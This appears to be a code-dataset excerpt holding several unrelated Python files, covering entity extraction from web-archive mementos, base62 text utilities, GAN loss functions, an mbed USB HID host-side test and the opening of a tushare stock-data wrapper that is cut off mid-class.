content stringlengths 5 1.05M |
|---|
import sys
import logging
module_logger = logging.getLogger('hypercane.report.entities')
def get_document_entities(urim, cache_storage, entity_types):
    """Extract named entities of the requested types from a single memento.

    Args:
        urim: the URI-M of the memento to process.
        cache_storage: cache storage URI, passed through to
            get_boilerplate_free_content.
        entity_types: iterable of spaCy entity labels (e.g. 'PERSON',
            'ORG') to keep.

    Returns:
        list of str: lowercased, whitespace-normalized entity strings.
        Duplicates are preserved so callers can compute frequencies.
    """
    # Imports stay local so the heavy NLP stack is only loaded in the
    # worker that actually performs extraction.  The previously-present
    # ``from nltk.corpus import stopwords`` import was unused and has
    # been removed.
    import spacy
    from hypercane.utils import get_boilerplate_free_content

    module_logger.debug("starting entity extraction process for {}".format(urim))

    content = get_boilerplate_free_content(urim, cache_storage=cache_storage)

    # NOTE(review): the spaCy model is loaded on every call; if this
    # becomes a bottleneck, cache the pipeline at module level.
    nlp = spacy.load("en_core_web_sm")
    doc = nlp(content.decode('utf8'))

    entities = [
        ent.text.strip().replace('\n', ' ').lower()
        for ent in doc.ents
        if ent.label_ in entity_types
    ]

    return entities
def generate_entities(urimlist, cache_storage, entity_types):
    """Extract entities from every memento and compute corpus statistics.

    Args:
        urimlist: list of URI-Ms to process.
        cache_storage: cache storage URI forwarded to the workers.
        entity_types: iterable of spaCy entity labels to keep.

    Returns:
        list of tuple, sorted descending by corpus frequency; each entry is
        (entity, frequency in corpus, probability in corpus,
        document frequency, document-frequency ratio, frequency * df ratio).
    """
    import concurrent.futures
    import nltk

    corpus_entities = []
    document_frequency = {}
    completed_count = 0
    # Hoisted out of the loop; also used for the df ratio below.
    total_count = len(urimlist)

    # Threads (not processes) suffice here: workers spend most of their
    # time in network/cache I/O inside get_document_entities.
    with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
        future_to_urim = {
            executor.submit(get_document_entities, urim, cache_storage, entity_types): urim
            for urim in urimlist
        }
        for future in concurrent.futures.as_completed(future_to_urim):
            urim = future_to_urim[future]
            try:
                document_entities = future.result()
                corpus_entities.extend(document_entities)
                # Count each entity at most once per document.
                for entity in set(document_entities):
                    document_frequency.setdefault(entity, 0)
                    document_frequency[entity] += 1
            except Exception as exc:
                module_logger.exception("URI-M [{}] generated an exception [{}], skipping...".format(urim, repr(exc)))
            completed_count += 1
            if completed_count % 100 == 0:
                module_logger.info("extracted entities from ({}/{}) mementos".format(completed_count, total_count))

    module_logger.info("discovered {} entities in corpus".format(len(corpus_entities)))

    fdist = nltk.FreqDist(corpus_entities)
    tf = [(fdist[term], term) for term in fdist]
    module_logger.info("calculated {} term frequencies".format(len(tf)))

    returned_terms = []

    for frequency_in_corpus, entity in sorted(tf, reverse=True):
        # NOTE(review): "probability" divides by the number of *unique*
        # terms rather than the total token count — kept as-is for output
        # compatibility; confirm intent.
        probability_in_corpus = float(frequency_in_corpus) / float(len(tf))
        # NOTE(review): despite the name, this is the plain document
        # frequency ratio df/N, not a log-scaled inverse document
        # frequency — kept as-is for output compatibility.
        inverse_document_frequency = document_frequency[entity] / total_count
        corpus_tfidf = frequency_in_corpus * (document_frequency[entity] / total_count)
        returned_terms.append( (
            entity, frequency_in_corpus, probability_in_corpus,
            document_frequency[entity], inverse_document_frequency,
            corpus_tfidf
        ) )

    return returned_terms
|
"""Utility functions for working with text."""
from __future__ import division, unicode_literals
import re
# Digits used by base62_encode, in ascending value order.
_BASE62_CHARS = \
    '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'

# Matches one or more commas with optional surrounding whitespace.
_SPLIT_RE = re.compile(r'\s*,+\s*')


def base62_encode(value):
    """Return a base62-encoded string representing a numeric value.

    Args:
        value (int):
            The number to encode. This must be a non-negative number.

    Returns:
        bytes:
            The base62-encoded string.

    Raises:
        ValueError:
            If ``value`` is negative.
    """
    if value == 0:
        return b'0'

    if value < 0:
        # Previously guarded by ``assert``, which is stripped under
        # ``python -O`` and would silently return b'' for negatives;
        # raise explicitly instead.
        raise ValueError('value must be non-negative, got %r' % (value,))

    encoded = []

    while value > 0:
        value, remainder = divmod(value, 62)
        encoded.append(_BASE62_CHARS[remainder])

    encoded.reverse()

    return ''.join(encoded).encode('ascii')
def split_comma_separated(s):
    """Return a list of values from a comma-separated string.

    Any blank values will be filtered out.

    Args:
        s (unicode):
            The string to split.

    Returns:
        list of unicode:
            The list of values.
    """
    # filter(None, ...) drops the empty strings that splitting a
    # leading/trailing or doubled comma produces.
    return list(filter(None, _SPLIT_RE.split(s)))
|
import torch
from torch import nn
import torchvision
class GeneratorLoss(nn.Module):
    """Composite loss for an SRGAN-style image generator.

    Combines four terms: an adversarial term rewarding discriminator
    fooling, a pixel-wise MSE term, a VGG16 perceptual term on frozen
    feature maps, and a total-variation smoothness term.
    """

    def __init__(self):
        super(GeneratorLoss, self).__init__()
        # VGG16 feature extractor for the perceptual loss.
        # NOTE(review): pretrained=True downloads weights on first use,
        # and the parameters are not frozen with requires_grad=False --
        # confirm whether gradients through VGG are intended.
        vgg = torchvision.models.vgg16(pretrained=True)
        self.vgg_network = nn.Sequential(*vgg.features).eval()
        self.mse_loss = nn.MSELoss()
        # loss factors (relative weights of the four terms)
        self.adversarial_loss_factor = 0.5
        self.mse_loss_factor = 1.0
        self.vgg_loss_factor = 1.0
        self.tv_loss_factor = 1e-4

    def forward(self, fake_out, fake_img, real_img):
        """Return the weighted sum of the four generator loss terms.

        Args:
            fake_out: discriminator output for the generated batch.
            fake_img: generated (fake) image batch.
            real_img: ground-truth image batch.
        """
        # Adversarial term: -log D(G(z)).
        # NOTE(review): element-wise, not reduced to a scalar here --
        # confirm the caller applies a reduction (e.g. .mean()).
        adversarial_loss = -torch.log(fake_out)
        mse_loss = self.mse_loss(fake_img, real_img)
        # Perceptual loss: MSE between VGG feature maps of both images.
        vgg_loss = self.mse_loss(
            self.vgg_network(fake_img), self.vgg_network(real_img))
        tv_loss = self.tv_loss(fake_img)
        return self.vgg_loss_factor * vgg_loss \
            + self.adversarial_loss_factor * adversarial_loss \
            + self.mse_loss_factor * mse_loss \
            + self.tv_loss_factor * tv_loss

    def tv_loss(self, x, tv_loss_weight=1):
        """Total-variation loss over a (batch, channel, height, width)
        tensor: penalizes differences between adjacent pixels to
        encourage spatial smoothness."""
        batch_size = x.size()[0]
        h_x = x.size()[2]
        w_x = x.size()[3]
        # Element counts of the shifted difference tensors, used to
        # normalize each direction's contribution.
        count_h = self._tensor_size(x[:, :, 1:, :])
        count_w = self._tensor_size(x[:, :, :, 1:])
        # Sum of squared differences between vertically / horizontally
        # adjacent pixels.
        h_tv = torch.pow((x[:, :, 1:, :] - x[:, :, :h_x - 1, :]), 2).sum()
        w_tv = torch.pow((x[:, :, :, 1:] - x[:, :, :, :w_x - 1]), 2).sum()
        return tv_loss_weight * 2 * (h_tv / count_h + w_tv / count_w) / batch_size

    def _tensor_size(self, t):
        # Number of elements per sample: channels * height * width.
        return t.size()[1] * t.size()[2] * t.size()[3]
class DiscriminatorLoss(nn.Module):
    """Standard GAN discriminator loss.

    Implements -log D(x) - log(1 - D(G(z))): the discriminator is
    rewarded for scoring real samples high and fake samples low.
    """

    def __init__(self):
        super(DiscriminatorLoss, self).__init__()

    def forward(self, fake_out, real_out):
        """Return the discriminator loss for the given scores.

        Args:
            fake_out: discriminator score(s) for generated samples.
            real_out: discriminator score(s) for real samples.
        """
        real_term = torch.log(real_out)
        fake_term = torch.log(1 - fake_out)
        return -(real_term + fake_term)
|
"""
mbed SDK
Copyright (c) 2019 ARM Limited
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import functools
import time
import threading
import uuid
import sys
import mbed_host_tests
import usb.core
from usb.util import (
CTRL_IN,
CTRL_OUT,
CTRL_TYPE_STANDARD,
CTRL_TYPE_CLASS,
CTRL_RECIPIENT_DEVICE,
CTRL_RECIPIENT_INTERFACE,
DESC_TYPE_CONFIG,
build_request_type)
if sys.platform.startswith('win'):
# Use libusb0 on Windows. libusb1 implementation for Windows
# does not support all features necessary for testing.
import usb.backend.libusb0
USB_BACKEND = usb.backend.libusb0.get_backend()
else:
# Use a default backend on other platforms.
USB_BACKEND = None
try:
import hid
except ImportError:
CYTHON_HIDAPI_PRESENT = False
else:
CYTHON_HIDAPI_PRESENT = True
# USB device -- device classes
USB_CLASS_HID = 0x03
# USB device -- standard requests
USB_REQUEST_GET_DESCRIPTOR = 0x06
# USB device -- HID class requests
HID_REQUEST_GET_REPORT = 0x01
HID_REQUEST_SET_REPORT = 0x09
HID_REQUEST_GET_IDLE = 0x02
HID_REQUEST_SET_IDLE = 0x0A
HID_REQUEST_GET_PROTOCOL = 0x03
HID_REQUEST_SET_PROTOCOL = 0x0B
# USB device -- HID class descriptors
DESC_TYPE_HID_HID = 0x21
DESC_TYPE_HID_REPORT = 0x22
DESC_TYPE_HID_PHYSICAL = 0x23
# USB device -- HID class descriptor lengths
DESC_LEN_HID_HID = 0x09
# USB device -- descriptor fields offsets
DESC_OFFSET_BLENGTH = 0
DESC_OFFSET_BDESCRIPTORTYPE = 1
# USB device -- HID subclasses
HID_SUBCLASS_NONE = 0
HID_SUBCLASS_BOOT = 1
# USB device -- HID protocols
HID_PROTOCOL_NONE = 0
HID_PROTOCOL_KEYBOARD = 1
HID_PROTOCOL_MOUSE = 2
# Greentea message keys used for callbacks
MSG_KEY_DEVICE_READY = 'dev_ready'
MSG_KEY_HOST_READY = 'host_ready'
MSG_KEY_SERIAL_NUMBER = 'usb_dev_sn'
MSG_KEY_TEST_GET_DESCRIPTOR_HID = 'test_get_desc_hid'
MSG_KEY_TEST_GET_DESCRIPTOR_CFG = 'test_get_desc_cfg'
MSG_KEY_TEST_REQUESTS = 'test_requests'
MSG_KEY_TEST_RAW_IO = 'test_raw_io'
# Greentea message keys used to notify DUT of test status
MSG_KEY_TEST_CASE_FAILED = 'fail'
MSG_KEY_TEST_CASE_PASSED = 'pass'
MSG_VALUE_DUMMY = '0'
MSG_VALUE_NOT_SUPPORTED = 'not_supported'
# Constants for the tests.
KEYBOARD_IDLE_RATE_TO_SET = 0x00 # Duration = 0 (indefinite)
HID_PROTOCOL_TO_SET = 0x01 # Protocol = 1 (Report Protocol)
RAW_IO_REPS = 16 # Number of loopback test reps.
def build_get_desc_value(desc_type, desc_index):
    """Build and return a wValue field for control requests.

    The descriptor type occupies the high byte and the descriptor
    index the low byte, per USB 2.0 spec paragraph 9.4.3.
    """
    high_byte = desc_type << 8
    return high_byte | desc_index
def usb_hid_path(serial_number):
    """Get a USB HID device system path based on the serial number.

    Returns None when the hidapi bindings are unavailable or no
    enumerated device matches the serial number.
    """
    if CYTHON_HIDAPI_PRESENT:
        for device_info in hid.enumerate():  # pylint: disable=no-member
            if device_info.get('serial_number') == serial_number:  # pylint: disable=not-callable
                return device_info['path']
    return None
def get_descriptor_types(desc):
    """Return a list of all bDescriptorType values found in desc.

    desc is expected to be a sequence of bytes, i.e. array.array('B')
    returned from usb.core.

    From the USB 2.0 spec, paragraph 9.5:
    Each descriptor begins with a byte-wide field that contains the total
    number of bytes in the descriptor followed by a byte-wide field that
    identifies the descriptor type.
    """
    tmp_desc = desc[DESC_OFFSET_BLENGTH:]
    desc_types = []
    while True:
        try:
            bLength = tmp_desc[DESC_OFFSET_BLENGTH]  # pylint: disable=invalid-name
            bDescriptorType = tmp_desc[DESC_OFFSET_BDESCRIPTORTYPE]  # pylint: disable=invalid-name
        except IndexError:
            # Ran off the end of the data -- no more descriptors.
            break
        if int(bLength) == 0:
            # A zero bLength would never advance tmp_desc, so the
            # original loop spun forever on malformed data; stop instead.
            break
        desc_types.append(int(bDescriptorType))
        tmp_desc = tmp_desc[int(bLength):]
    return desc_types
def get_hid_descriptor_parts(hid_descriptor):
    """Return bNumDescriptors, bDescriptorType, wDescriptorLength from hid_descriptor.

    Raises TypeError when the buffer is not a valid HID class descriptor.
    """
    err_msg = 'Invalid HID class descriptor'
    try:
        if hid_descriptor[1] != DESC_TYPE_HID_HID:
            raise TypeError(err_msg)
        bNumDescriptors = int(hid_descriptor[5])  # pylint: disable=invalid-name
        bDescriptorType = int(hid_descriptor[6])  # pylint: disable=invalid-name
        # wDescriptorLength is little-endian: low byte first.
        low_byte = hid_descriptor[7]
        high_byte = hid_descriptor[8]
        wDescriptorLength = int((high_byte << 8) | low_byte)  # pylint: disable=invalid-name
    except (IndexError, ValueError):
        raise TypeError(err_msg)
    return bNumDescriptors, bDescriptorType, wDescriptorLength
def get_usbhid_dev_type(intf):
    """Return a name of the HID device class type for intf."""
    if not isinstance(intf, usb.core.Interface):
        return None
    # USB Device Class Definition for HID, v1.11, paragraphs 4.1, 4.2 & 4.3:
    # the class is specified in the Interface descriptor
    # and not the Device descriptor.
    if intf.bInterfaceClass != USB_CLASS_HID:
        return None
    if intf.bInterfaceSubClass == HID_SUBCLASS_BOOT:
        if intf.bInterfaceProtocol == HID_PROTOCOL_KEYBOARD:
            return 'boot_keyboard'
        if intf.bInterfaceProtocol == HID_PROTOCOL_MOUSE:
            return 'boot_mouse'
    # Determining any other HID dev type, like a non-boot_keyboard or
    # a non-boot_mouse requires getting and parsing a HID Report descriptor
    # for intf.
    # Only the boot_keyboard, boot_mouse and other_device are used for this
    # greentea test suite.
    return 'other_device'
class RetryError(Exception):
    """Exception raised by retry_fun_call() when every attempt fails."""
def retry_fun_call(fun, num_retries=3, retry_delay=0.0):
    """Call fun and retry if any exception was raised.

    fun is called at most num_retries times with a retry_delay (seconds)
    in between calls.  Returns whatever fun returns on first success.
    Raises RetryError if the retry limit is exhausted.
    """
    verbose = False
    final_err = None
    for retry in range(1, num_retries + 1):
        try:
            return fun()  # pylint: disable=not-callable
        except Exception as exc:  # pylint: disable=broad-except
            final_err = exc
            if verbose:
                print('Retry {}/{} failed ({})'
                      .format(retry, num_retries, str(fun)))
            # Only sleep between attempts; the original also slept after
            # the final failure, delaying the RetryError needlessly.
            if retry < num_retries:
                time.sleep(retry_delay)
    err_msg = 'Failed with "{}". Tried {} times.'
    raise RetryError(err_msg.format(final_err, num_retries))
def raise_if_different(expected, actual, text=''):
    """Raise a RuntimeError if actual is different than expected."""
    if expected == actual:
        return
    raise RuntimeError('{}Got {!r}, expected {!r}.'.format(text, actual, expected))
def raise_if_false(expression, text):
    """Raise a RuntimeError if expression is False."""
    if expression:
        return
    raise RuntimeError(text)
class USBHIDTest(mbed_host_tests.BaseHostTest):
    """Host side test for USB device HID class."""

    @staticmethod
    def get_usb_hid_path(usb_id_str):
        """Get a USB HID device path as registered in the system.

        Search is based on the unique USB SN generated by the host
        during test suite setup.
        Raises RuntimeError if the device is not found.
        """
        hid_path = usb_hid_path(usb_id_str)
        if hid_path is None:
            err_msg = 'USB HID device (SN={}) not found.'
            raise RuntimeError(err_msg.format(usb_id_str))
        return hid_path

    @staticmethod
    def get_usb_dev(usb_id_str):
        """Get a usb.core.Device instance.

        Search is based on the unique USB SN generated by the host
        during test suite setup.
        Raises RuntimeError if the device is not found.
        """
        usb_dev = usb.core.find(custom_match=lambda d: d.serial_number == usb_id_str, backend=USB_BACKEND)
        if usb_dev is None:
            err_msg = 'USB device (SN={}) not found.'
            raise RuntimeError(err_msg.format(usb_id_str))
        return usb_dev

    def __init__(self):
        super(USBHIDTest, self).__init__()
        # Background thread that handles raw HID I/O; see start_bg_task().
        self.__bg_task = None
        # Unique SN the DUT presents in its USB device descriptor.
        self.dut_usb_dev_sn = uuid.uuid4().hex  # 32 hex digit string

    def notify_error(self, msg):
        """Terminate the test with an error msg."""
        self.log('TEST ERROR: {}'.format(msg))
        self.notify_complete(None)

    def notify_failure(self, msg):
        """Report a host side test failure to the DUT."""
        self.log('TEST FAILED: {}'.format(msg))
        self.send_kv(MSG_KEY_TEST_CASE_FAILED, MSG_VALUE_DUMMY)

    def notify_success(self, value=None, msg=''):
        """Report a host side test success to the DUT."""
        if msg:
            self.log('TEST PASSED: {}'.format(msg))
        if value is None:
            value = MSG_VALUE_DUMMY
        self.send_kv(MSG_KEY_TEST_CASE_PASSED, value)

    def cb_test_get_hid_desc(self, key, value, timestamp):
        """Verify the device handles Get_Descriptor request correctly.

        Two requests are tested for every HID interface:
        1. Get_Descriptor(HID),
        2. Get_Descriptor(Report).
        Details in USB Device Class Definition for HID, v1.11, paragraph 7.1.
        """
        kwargs_hid_desc_req = {
            'bmRequestType': build_request_type(
                CTRL_IN, CTRL_TYPE_STANDARD, CTRL_RECIPIENT_INTERFACE),
            'bRequest': USB_REQUEST_GET_DESCRIPTOR,
            # Descriptor Index (part of wValue) is reset to zero for
            # HID class descriptors other than Physical ones.
            'wValue': build_get_desc_value(DESC_TYPE_HID_HID, 0x00),
            # wIndex is replaced with the Interface Number in the loop.
            'wIndex': None,
            'data_or_wLength': DESC_LEN_HID_HID}
        kwargs_report_desc_req = {
            'bmRequestType': build_request_type(
                CTRL_IN, CTRL_TYPE_STANDARD, CTRL_RECIPIENT_INTERFACE),
            'bRequest': USB_REQUEST_GET_DESCRIPTOR,
            # Descriptor Index (part of wValue) is reset to zero for
            # HID class descriptors other than Physical ones.
            'wValue': build_get_desc_value(DESC_TYPE_HID_REPORT, 0x00),
            # wIndex is replaced with the Interface Number in the loop.
            'wIndex': None,
            # wLength is replaced with the Report Descriptor Length in the loop.
            'data_or_wLength': None}
        mbed_hid_dev = None
        report_desc_lengths = []
        try:
            # The DUT may still be (re)enumerating; retry the lookup.
            mbed_hid_dev = retry_fun_call(
                fun=functools.partial(self.get_usb_dev, self.dut_usb_dev_sn),  # pylint: disable=not-callable
                num_retries=20,
                retry_delay=0.05)
        except RetryError as exc:
            self.notify_error(exc)
            return
        try:
            for intf in mbed_hid_dev.get_active_configuration():  # pylint: disable=not-callable
                if intf.bInterfaceClass != USB_CLASS_HID:
                    continue
                try:
                    # Detach the OS driver so we can issue control
                    # transfers directly; not supported on every
                    # platform/backend, hence the broad excepts.
                    if mbed_hid_dev.is_kernel_driver_active(intf.bInterfaceNumber):
                        mbed_hid_dev.detach_kernel_driver(intf.bInterfaceNumber)  # pylint: disable=not-callable
                except (NotImplementedError, AttributeError):
                    pass
                # Request the HID descriptor.
                kwargs_hid_desc_req['wIndex'] = intf.bInterfaceNumber
                hid_desc = mbed_hid_dev.ctrl_transfer(**kwargs_hid_desc_req)  # pylint: disable=not-callable
                try:
                    bNumDescriptors, bDescriptorType, wDescriptorLength = get_hid_descriptor_parts(hid_desc)  # pylint: disable=invalid-name
                except TypeError as exc:
                    self.notify_error(exc)
                    return
                raise_if_different(1, bNumDescriptors, 'Exactly one HID Report descriptor expected. ')
                raise_if_different(DESC_TYPE_HID_REPORT, bDescriptorType, 'Invalid HID class descriptor type. ')
                raise_if_false(wDescriptorLength > 0, 'Invalid HID Report descriptor length. ')
                # Request the Report descriptor.
                kwargs_report_desc_req['wIndex'] = intf.bInterfaceNumber
                kwargs_report_desc_req['data_or_wLength'] = wDescriptorLength
                report_desc = mbed_hid_dev.ctrl_transfer(**kwargs_report_desc_req)  # pylint: disable=not-callable
                raise_if_different(wDescriptorLength, len(report_desc),
                                   'The size of data received does not match the HID Report descriptor length. ')
                report_desc_lengths.append(len(report_desc))
        except usb.core.USBError as exc:
            self.notify_failure('Get_Descriptor request failed. {}'.format(exc))
        except RuntimeError as exc:
            self.notify_failure(exc)
        else:
            # Send the report desc len to the device.
            # USBHID::report_desc_length() returns uint16_t
            msg_value = '{0:04x}'.format(max(report_desc_lengths))
            self.notify_success(msg_value)

    def cb_test_get_cfg_desc(self, key, value, timestamp):
        """Verify the device provides required HID descriptors.

        USB Device Class Definition for HID, v1.11, paragraph 7.1:
        When a Get_Descriptor(Configuration) request is issued, it
        returns (...), and the HID descriptor for each interface.
        """
        kwargs_cfg_desc_req = {
            'bmRequestType': build_request_type(
                CTRL_IN, CTRL_TYPE_STANDARD, CTRL_RECIPIENT_DEVICE),
            'bRequest': USB_REQUEST_GET_DESCRIPTOR,
            # Descriptor Index (part of wValue) is reset to zero.
            'wValue': build_get_desc_value(DESC_TYPE_CONFIG, 0x00),
            # wIndex is reset to zero.
            'wIndex': 0x00,
            # wLength unknown, set to 1024.
            'data_or_wLength': 1024}
        mbed_hid_dev = None
        try:
            # The DUT may still be (re)enumerating; retry the lookup.
            mbed_hid_dev = retry_fun_call(
                fun=functools.partial(self.get_usb_dev, self.dut_usb_dev_sn),  # pylint: disable=not-callable
                num_retries=20,
                retry_delay=0.05)
        except RetryError as exc:
            self.notify_error(exc)
            return
        try:
            # Request the Configuration descriptor.
            cfg_desc = mbed_hid_dev.ctrl_transfer(**kwargs_cfg_desc_req)  # pylint: disable=not-callable
            raise_if_false(DESC_TYPE_HID_HID in get_descriptor_types(cfg_desc),
                           'No HID class descriptor in the Configuration descriptor.')
        except usb.core.USBError as exc:
            self.notify_failure('Get_Descriptor request failed. {}'.format(exc))
        except RuntimeError as exc:
            self.notify_failure(exc)
        else:
            self.notify_success()

    def cb_test_class_requests(self, key, value, timestamp):
        """Verify all required HID requests are supported.

        USB Device Class Definition for HID, v1.11, Appendix G:
        1. Get_Report -- required for all types,
        2. Set_Report -- not required if dev doesn't declare an Output Report,
        3. Get_Idle -- required for keyboards,
        4. Set_Idle -- required for keyboards,
        5. Get_Protocol -- required for boot_keyboard and boot_mouse,
        6. Set_Protocol -- required for boot_keyboard and boot_mouse.
        Details in USB Device Class Definition for HID, v1.11, paragraph 7.2.
        """
        kwargs_get_report_request = {
            'bmRequestType': build_request_type(
                CTRL_IN, CTRL_TYPE_CLASS, CTRL_RECIPIENT_INTERFACE),
            'bRequest': HID_REQUEST_GET_REPORT,
            # wValue: ReportType = Input, ReportID = 0 (not used)
            'wValue': (0x01 << 8) | 0x00,
            # wIndex: InterfaceNumber (defined later)
            'wIndex': None,
            # wLength: unknown, set to 1024
            'data_or_wLength': 1024}
        kwargs_get_idle_request = {
            'bmRequestType': build_request_type(
                CTRL_IN, CTRL_TYPE_CLASS, CTRL_RECIPIENT_INTERFACE),
            'bRequest': HID_REQUEST_GET_IDLE,
            # wValue: 0, ReportID = 0 (not used)
            'wValue': (0x00 << 8) | 0x00,
            # wIndex: InterfaceNumber (defined later)
            'wIndex': None,
            'data_or_wLength': 1}
        kwargs_set_idle_request = {
            'bmRequestType': build_request_type(
                CTRL_OUT, CTRL_TYPE_CLASS, CTRL_RECIPIENT_INTERFACE),
            'bRequest': HID_REQUEST_SET_IDLE,
            # wValue: Duration, ReportID = 0 (all input reports)
            'wValue': (KEYBOARD_IDLE_RATE_TO_SET << 8) | 0x00,
            # wIndex: InterfaceNumber (defined later)
            'wIndex': None,
            'data_or_wLength': 0}
        kwargs_get_protocol_request = {
            'bmRequestType': build_request_type(
                CTRL_IN, CTRL_TYPE_CLASS, CTRL_RECIPIENT_INTERFACE),
            'bRequest': HID_REQUEST_GET_PROTOCOL,
            'wValue': 0x00,
            # wIndex: InterfaceNumber (defined later)
            'wIndex': None,
            'data_or_wLength': 1}
        kwargs_set_protocol_request = {
            'bmRequestType': build_request_type(
                CTRL_OUT, CTRL_TYPE_CLASS, CTRL_RECIPIENT_INTERFACE),
            'bRequest': HID_REQUEST_SET_PROTOCOL,
            'wValue': HID_PROTOCOL_TO_SET,
            # wIndex: InterfaceNumber (defined later)
            'wIndex': None,
            'data_or_wLength': 0}
        mbed_hid_dev = None
        try:
            # The DUT may still be (re)enumerating; retry the lookup.
            mbed_hid_dev = retry_fun_call(
                fun=functools.partial(self.get_usb_dev, self.dut_usb_dev_sn),  # pylint: disable=not-callable
                num_retries=20,
                retry_delay=0.05)
        except RetryError as exc:
            self.notify_error(exc)
            return
        hid_dev_type = None
        # Tracks which request is in flight so the failure message can
        # name it.
        tested_request_name = None
        try:
            for intf in mbed_hid_dev.get_active_configuration():  # pylint: disable=not-callable
                hid_dev_type = get_usbhid_dev_type(intf)
                if hid_dev_type is None:
                    continue
                try:
                    # Detach the OS driver so we can issue control
                    # transfers directly; not supported everywhere.
                    if mbed_hid_dev.is_kernel_driver_active(intf.bInterfaceNumber):
                        mbed_hid_dev.detach_kernel_driver(intf.bInterfaceNumber)  # pylint: disable=not-callable
                except (NotImplementedError, AttributeError):
                    pass
                if hid_dev_type == 'boot_keyboard':
                    # 4. Set_Idle
                    tested_request_name = 'Set_Idle'
                    kwargs_set_idle_request['wIndex'] = intf.bInterfaceNumber
                    mbed_hid_dev.ctrl_transfer(**kwargs_set_idle_request)  # pylint: disable=not-callable
                    # 3. Get_Idle
                    tested_request_name = 'Get_Idle'
                    kwargs_get_idle_request['wIndex'] = intf.bInterfaceNumber
                    idle_rate = mbed_hid_dev.ctrl_transfer(**kwargs_get_idle_request)  # pylint: disable=not-callable
                    raise_if_different(KEYBOARD_IDLE_RATE_TO_SET, idle_rate, 'Invalid idle rate received. ')
                if hid_dev_type in ('boot_keyboard', 'boot_mouse'):
                    # 6. Set_Protocol
                    tested_request_name = 'Set_Protocol'
                    kwargs_set_protocol_request['wIndex'] = intf.bInterfaceNumber
                    mbed_hid_dev.ctrl_transfer(**kwargs_set_protocol_request)  # pylint: disable=not-callable
                    # 5. Get_Protocol
                    tested_request_name = 'Get_Protocol'
                    kwargs_get_protocol_request['wIndex'] = intf.bInterfaceNumber
                    protocol = mbed_hid_dev.ctrl_transfer(**kwargs_get_protocol_request)  # pylint: disable=not-callable
                    raise_if_different(HID_PROTOCOL_TO_SET, protocol, 'Invalid protocol received. ')
                # 1. Get_Report
                tested_request_name = 'Get_Report'
                kwargs_get_report_request['wIndex'] = intf.bInterfaceNumber
                mbed_hid_dev.ctrl_transfer(**kwargs_get_report_request)  # pylint: disable=not-callable
        except usb.core.USBError as exc:
            self.notify_failure('The {!r} does not support the {!r} HID class request ({}).'
                                .format(hid_dev_type, tested_request_name, exc))
        except RuntimeError as exc:
            self.notify_failure('Set/Get data mismatch for {!r} for the {!r} HID class request ({}).'
                                .format(hid_dev_type, tested_request_name, exc))
        else:
            self.notify_success()

    def raw_loopback(self, report_size):
        """Send every input report back to the device."""
        mbed_hid_path = None
        mbed_hid = hid.device()
        try:
            # The DUT may still be (re)enumerating; retry path lookup
            # and open.
            mbed_hid_path = retry_fun_call(
                fun=functools.partial(self.get_usb_hid_path, self.dut_usb_dev_sn),  # pylint: disable=not-callable
                num_retries=20,
                retry_delay=0.05)
            retry_fun_call(
                fun=functools.partial(mbed_hid.open_path, mbed_hid_path),  # pylint: disable=not-callable
                num_retries=10,
                retry_delay=0.05)
        except RetryError as exc:
            self.notify_error(exc)
            return
        # Notify the device it can send reports now.
        self.send_kv(MSG_KEY_HOST_READY, MSG_VALUE_DUMMY)
        try:
            for _ in range(RAW_IO_REPS):
                # There are no Report ID tags in the Report descriptor.
                # Receiving only the Report Data, Report ID is omitted.
                report_in = mbed_hid.read(report_size)
                report_out = report_in[:]
                # Set the Report ID to 0x00 (not used).
                report_out.insert(0, 0x00)
                mbed_hid.write(report_out)
        except (ValueError, IOError) as exc:
            self.notify_failure('HID Report transfer failed. {}'.format(exc))
        finally:
            mbed_hid.close()

    def setup(self):
        # Wire greentea message keys to their callbacks.
        self.register_callback(MSG_KEY_DEVICE_READY, self.cb_device_ready)
        self.register_callback(MSG_KEY_TEST_GET_DESCRIPTOR_HID, self.cb_test_get_hid_desc)
        self.register_callback(MSG_KEY_TEST_GET_DESCRIPTOR_CFG, self.cb_test_get_cfg_desc)
        self.register_callback(MSG_KEY_TEST_REQUESTS, self.cb_test_class_requests)
        self.register_callback(MSG_KEY_TEST_RAW_IO, self.cb_test_raw_io)

    def cb_device_ready(self, key, value, timestamp):
        """Send a unique USB SN to the device.

        DUT uses this SN every time it connects to host as a USB device.
        """
        self.send_kv(MSG_KEY_SERIAL_NUMBER, self.dut_usb_dev_sn)

    def start_bg_task(self, **thread_kwargs):
        """Start a new daemon thread.

        Some callbacks delegate HID dev handling to a background task to
        prevent any delays in the device side assert handling. Only one
        background task is kept running to prevent multiple access
        to the HID device.
        """
        try:
            # Wait for the previous task (if any) before starting a new
            # one; AttributeError covers the first call (task is None),
            # RuntimeError a thread that was never started.
            self.__bg_task.join()
        except (AttributeError, RuntimeError):
            pass
        self.__bg_task = threading.Thread(**thread_kwargs)
        self.__bg_task.daemon = True
        self.__bg_task.start()

    def cb_test_raw_io(self, key, value, timestamp):
        """Receive HID reports and send them back to the device."""
        if not CYTHON_HIDAPI_PRESENT:
            # hidapi bindings missing on this host: tell the DUT to skip.
            self.send_kv(MSG_KEY_HOST_READY, MSG_VALUE_NOT_SUPPORTED)
            return
        try:
            # The size of input and output reports used in test.
            report_size = int(value)
        except ValueError as exc:
            self.notify_error(exc)
            return
        self.start_bg_task(
            target=self.raw_loopback,
            args=(report_size, ))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Time-stamp: <2017-01-06 17:03:39 Friday by wls81>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Time-stamp: <2013-09-06 00:43:23 Friday by zhangguhua>
# @version 1.0
# @author your name
import os
import tushare as ts
import cPickle as pickle
# 数据存储路径
data_path = os.path.dirname(os.path.abspath(__file__)) + '/data'
class TushareAPI:
    """Wrapper around commonly used tushare functions.

    The full market listing is cached on disk under ``data_path`` so
    later instantiations avoid refetching from the network.
    """

    def __init__(self, init_file=None):
        """Load cached market data, fetching and rebuilding the cache on a miss.

        :param init_file: initialization file to load (currently unused)
        :returns: None
        :rtype: NoneType
        """
        # Full listing of all stocks (tushare DataFrame).
